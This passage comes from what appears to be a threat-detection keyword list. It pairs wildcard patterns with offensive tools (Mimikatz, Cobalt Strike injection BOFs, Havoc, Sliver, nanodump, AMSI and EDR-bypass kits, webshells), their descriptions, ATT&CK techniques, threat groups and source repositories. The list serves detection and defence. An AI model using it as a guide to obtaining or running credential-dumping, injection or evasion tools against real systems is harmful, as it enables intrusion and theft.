- T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Import-DllInRemoteProcess*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Import-DllInRemoteProcess*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Import-Module *Microsoft.ActiveDirectory.Management.dll*","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","0","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" +"*Inactive Domain Admins Honey Tokens*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*inceptor*POWERSHELL*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*inceptor.py *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*inceptor/obfuscators*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*inceptor-main.zip*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*include beacon.h*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*include injection.c*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*include*bofmask.h*","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","1","94","24","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" +"*incognito* list_tokens -u*","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*incognito.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*incorrect signature*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*infection_monkey.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*info@skelsecprojects.com*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*infoga.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*information_gathering_tools.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*infosecn1nja/SharpDoor*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" +"*Initial_Access.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*InitialAccess_SpearphishingAttachment_FakeWordDoc.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*InitialAccess_SpearphishingAttachment_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*initialize_fake_thread_state*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*initialize_spoofed_callstack*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*initializeShellcodeFluctuation*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" +"*Initializing domainDumper()*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*initstring/cloud_enum*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*inject 1337 /*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*inject shellcode*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*inject.spawn*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*inject.spoofaddr*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*inject_dll_reflective.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*inject_dll_srdi.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*inject_shellcode.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*inject_shellcode_self*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*inject-amsiBypass *","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","0","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*inject-amsi-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*inject-amsiBypass.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*inject-assembly *","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","0","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*inject-assembly.cna*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*injectassembly.x64.bin*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*injectassembly.x64.o*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*Inject-BypassStuff*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - 